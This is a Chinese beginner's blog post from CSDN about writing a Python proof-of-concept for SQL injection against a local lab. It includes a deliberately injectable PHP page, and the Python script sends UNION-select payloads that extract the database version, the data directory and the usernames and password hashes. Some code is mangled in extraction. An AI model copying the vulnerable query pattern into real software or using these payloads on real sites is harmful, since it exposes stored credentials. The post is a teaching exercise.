python编写poc_学习Python到写poc其实没那么难

最新推荐文章于 2023-10-03 20:39:46 发布
最新推荐文章于 2023-10-03 20:39:46 发布
阅读量611 收藏
点赞数
文章标签: python编写poc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36084130/article/details/112944313
版权

现在,开始!

0x00 前言

今天刚刚把放到收藏夹准备看的,然后又看到题主的这个问题。顺便观摩了1楼大神的博客,我这种炒鸡新手表示很兴奋啊,阔以好好学习代码审计吖!但是萌妹子说了“不会开发的谈审计都是耍流氓!:)”。怎么办?? 我不会开发啊,我怎么学啊?????

0x01 不会开发可以”抄”

作为一个学渣,要考试的时候,总是把历年考题拿出来,别人题型怎么写的,你就怎么套,不用去管他原理。就好比别人都叫三楼红老师,我们也这样叫就准没错的。昨天三个白帽的那个hanmeimei和lilie的题都不知道怎么下手,怎么办?我自己写一个吧!

0x02 抄sql语句

DROP DATABASE IF EXISTS foolish;

CREATE DATABASE foolish;

CREATE USER user1@'%' IDENTIFIED BY 'password1';

GRANT ALL PRIVILEGES ON foolish.* TO user1;

USE foolish;

CREATE TABLE users

(

id int(3) NOT NULL AUTO_INCREMENT,

username varchar(20) NOT NULL,

password varchar(20) NOT NULL,

PRIMARY KEY (id)

);

INSERT INTO foolish.users (id,username,password) VALUES ('1','lilei','49ba59abbe56e057'),('2','hanmeimei','80650b029161be86'),('3','xiao3','7bf9108cd896f33c');1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

蛤蛤,炒鸡简单,会点英文就可以看懂。

0x03 抄php代码

echo '

';

$con = mysqli_connect('127.0.0.1','root','',"foolish");

if(isset($_GET['name']))

{

$name = $_GET['name'];

$sql = "SELECT * FROM users WHERE username='".$name."' LIMIT 0,1";

$result = mysqli_query($con,$sql);

$row = mysqli_fetch_array($result);

if($row)

{

echo "";

echo "";

echo "Your login name :";

echo $row['username'];

echo "";

echo "";

}

else

{

echo "hell";

echo '';

print_r(mysqli_error());

echo "";

}

}

echo '';

?>1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

保存为poc.php,调试出来后,发现其实是相当简单的。

0x04

直接将sql文件导入到数据库,php文件就可以访问了,反正我这测试可以访问.

http://127.0.0.1/poc.php?name=lilei

非常容易的注入,就不分析了。

0x05 楼主说的用python写poc

首先,之前一直看评论有人在说requests模块。虽然,我没有用过,但是我会抄代码啊,打开官方文档。其实就是用python模拟浏览器请求,然后接受返回值。中间进行判断之类的。

POC:

import requests

from bs4 import BeautifulSoup

import sys

def main(argv):

if(len(argv) == 1):

print "Usege:python exploit.py http://localhost/"

else:

url = argv[1]

all_payload = ["poctest.php?name=lilei'and 1=2 union select 1,2,3--+",

"poctest.php?name=lilei'and 1=2 union select 1,@@version,3--+",

"poctest.php?name=lilei'and 1=2 union select 1,@@datadir,3--+",

"poctest.php?name=lilei'and 1=2 union select 1,username,3 from users--+",

"poctest.php?name=lilei'and 1=2 union select 1,password,3 from users--+"

]

for payload in all_payload:

exp = url + payload

r = requests.get(exp)

soup = BeautifulSoup(r.text,"html.parser")

print soup.em.string[16:]

if __name__ == '__main__':

main(sys.argv)1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

0x06 总结

由于楼主问从学Python到写个poc用多长时间,其实吧,主要是你前提得给漏洞原理分析出来。写poc就是程序代替人的过程。

其实吧,编程只是一个工具,对于所有语言。他都是要接收一个输入,来自人类。然后程序内部进行处理。最后输出给人类。

所以,对于这个漏洞程序来说:

(1)php的接收人类的输入是$_GET[‘name’]。

php输出给人类的是浏览器上显示的结果。

php输出给mysql服务器的是要执行的sql语句。(这里造成漏洞)

(2)mysql接收的是php传递的执行语句

mysql输出的是执行的结果

(3) python输入的是url参数

python输出的是exploit的结果

所以,我的总结是学习语言,要先明白他的输入-输出模型,然后求出它的传递函数。也就是中间的各种算法类的,也就是红老师说的打好基础。

但是,对于新手来说,兴趣比较重要,代码的东西这么复杂,你要都去了解很打击信心的,你只需要知道别人这样做是对的,你就这样做准没错

charming-yy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python从入门到编写POC之读文件1
08-03
一个文件被打开后,有一个file对象,可以得到有关该文件的各种信息,以下是一些使用方法:file.closed 返回true如果文件已被关闭,否则返回false
sql注入pythonpoc_分享使用python编写poc,exp的实例教程
weixin_39592789的博客
12-17 472
在很久很久以,我有一个梦想 但是,后来我发现我的梦想渐渐有了于是,昨天我思考了一晚上觉得我应该有个梦想的!好了,回到正题。正所谓明人不装暗逼,今天我家开通了公网ip我开森啊,很开森的那种!额,又跑题了下面我们真的开始了:0x01先来简单看看鞋poc,exp的思路吧:首先,我们需要知道这个漏洞,也就是发现漏洞然后,我们需要知道这个漏洞原理,也就是了解原理其次,我们需要搭建环境,或者是网上找环境了解...
python traceback_干货分享丨Python从入门到编写POC之常用的标准库
weixin_39796149的博客
10-24 300
前期回顾>>Python介绍及安装使用Python从入门到编写POC之读文件Python从入门到编写POC之特殊函数Python从入门到编写POC系列文章是i春秋论坛作家「Exp1ore」表哥原创的一套完整教程,想系统学习Python技能的小伙伴,不要错过哦!公众号旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。常用的标准库安装完Python之后,我们也同时获得了...
python编写poc_Poc编写
weixin_39619635的博客
01-14 1097
0x01 PoCPoC(全称: Proof of Concept), 又叫概念验证。作为我们的漏洞验证程序,他可能是一段不完整的程序,仅仅是为了证明我们提出漏洞的观点。推荐使用Python编写PoC,因为安全界用 Python 的人居多,的东西能被更多人看懂,并且 Python 这门语言的灵活,类库强大等特性,给编写的人提供了很大便利。Exp(全称: Exploit),又叫漏洞利用程序。比如目标...
PythonPOC编写
qq_59923059的博客
08-15 1751
PythonPOC编写入门
Python从入门到编写POC之特殊函数1
08-03
Python从入门到编写POC之特殊函数1
Python库 | zachs_pypi_poc_a-0.5.tar.gz
05-24
资源分类:Python库 所属语言:Python 资源全名:zachs_pypi_poc_a-0.5.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
python爬虫_自动获取seebug的poc实例
09-21
下面小编就为大家带来一篇python爬虫_自动获取seebug的poc实例。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
PythonAPI_PoC_ConfluenceAndJira
03-30
PythonAPI_PoC_ConfluenceAndJira
python编写poc_POC编写基础知识
weixin_29405101的博客
12-23 3284
什么是 PoCPoC(全称: Proof of Concept), 中文译作概念验证。在安全界,你可以理解成为漏洞验证程序,和一些应用程序相比,PoC 是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码什么是 ExpExp(全称: Exploit),中文叫漏洞利用程序。名字上说的已经很清楚了,简单讲,就是一段可以发挥漏洞价值的程序,这话感觉和说一样。想象一下这样的场景,目标存在一个 SQL...
MS17-010 python poc
03-23
MS17-010 python poc,MS17-010 python pocMS17-010 python pocMS17-010 python poc
python编写简单poc,验证dvwa靶场
记录日常学习
09-02 353
python编写简单poc练习,熟悉poc基本构造,以dvwa为例。
Python黑客学习笔记:从HelloWorld到编写PoC(上)
Thinking and Coding Life
02-24 8355
中文原文地址:http://www.freebuf.com/news/special/58048.html 本系列文章适合CS在读学生和万年工具党,本文会在英文原文的基础上做些修改,并适当增加些解释说明。 本篇包含原文的前几部分: 0x0 – Getting Started      - 从零开始 0x1 – Getting Started Pt.2   - 进阶 0x2 – Por
chatgpt赋能pythonPythonPOC:提高网络安全攻防技能的利器
weixin_45566993的博客
06-02 480
POC是指为了验证某项功能是否存在或漏洞是否可被成功利用的一段代码。在网络安全领域中,POC通常被用于验证漏洞是否存在或者可被攻击者利用。POC可以用于漏洞发现过程中,攻击者通过编写和利用POC来寻找漏洞。同时,POC也可以用于漏洞修复过程中,安全研究人员或漏洞发现者利用POC来验证漏洞是否已经被修复。POC通常表示为一些脚本程序或者独立的应用程序。本文由chatgpt生成,文章有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc。
python编写poc_干货分享丨Python从入门到编写POC之爬虫专题
weixin_42513054的博客
12-23 839
Python从入门到编写POC系列文章是i春秋论坛作家「Exp1ore」表哥原创的一套完整教程,想系统学习Python技能的小伙伴,不要错过哦!Python从入门到编写POC之爬虫专题说到爬虫,用Python的貌似是很多的。举个例子,re模块,BeautifulSoup模块,pyspider模块,pyquery等,当然还要用到requests模块,urllib模块,urllib2模块,还有一个四...
python 一个通用的POC模板
YouthBelief的博客
02-16 1229
0x00 前言 平时工作中 需要编写pocpoc 大多步骤是重复的 比如用户输入 等 因此一套模板 直接套用即可 0x01 模板编写 1.1 引入库 import sys import getopt import requests import threading import time import os import datetime import urllib3 from colorama import init, Fore # 修改命令行中颜色的库 #禁用https安全请求警告 以防
python编写poc,以DVWA-command_injection为例
weixin_44248977的博客
10-03 137
一个简单的命令注入POC编写,用python实现,希望大佬们批评指正
Python小练习】使用Python编写POC 脚本-上篇
慢就是快
09-13 448
Poc(全称: Proof Of Concept), 中文译作概念验证。在网络安全行业,理解为**漏洞验证程序,**类似于程序开发中的功能Demo,仅证明某功能或观点的可行性,一般不具备“破坏性”。Exp(全称: Exploit),中文叫译作漏洞利用程序,就是一段可以发挥漏洞价值的程序。比如SQL注入漏洞,运行Exp脚本可以通过漏洞获取数据库敏感数据内容或服务器权限。
pythonpoc
weixin_45694388的博客
10-10 460
0x01 特殊函数 0x02 模块 0x03 小工具开发记录 特殊函数 # -*- coding:utf-8 -*- #内容见POC.demo; POC.demo2 ; def add(x,y): a=x+y print(a) add(3,5) print('------------引入lambad版本:') add = lambda x,y : x+y print(add(3,5)) #lambda函数,在lambda函数后面直接加变量,变量后直接冒号,冒号后面是表达式,完美解
python编写poc脚本
最新发布
10-11
编写 Python POC(Proof of Concept)脚本时,您需要先确定攻击目标和漏洞类型。然后,您可以使用适当的库和模块来构建脚本。以下是一个示例脚本,用于检测目标是否存在一个简单的HTTP服务,并输出其响应状态码: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值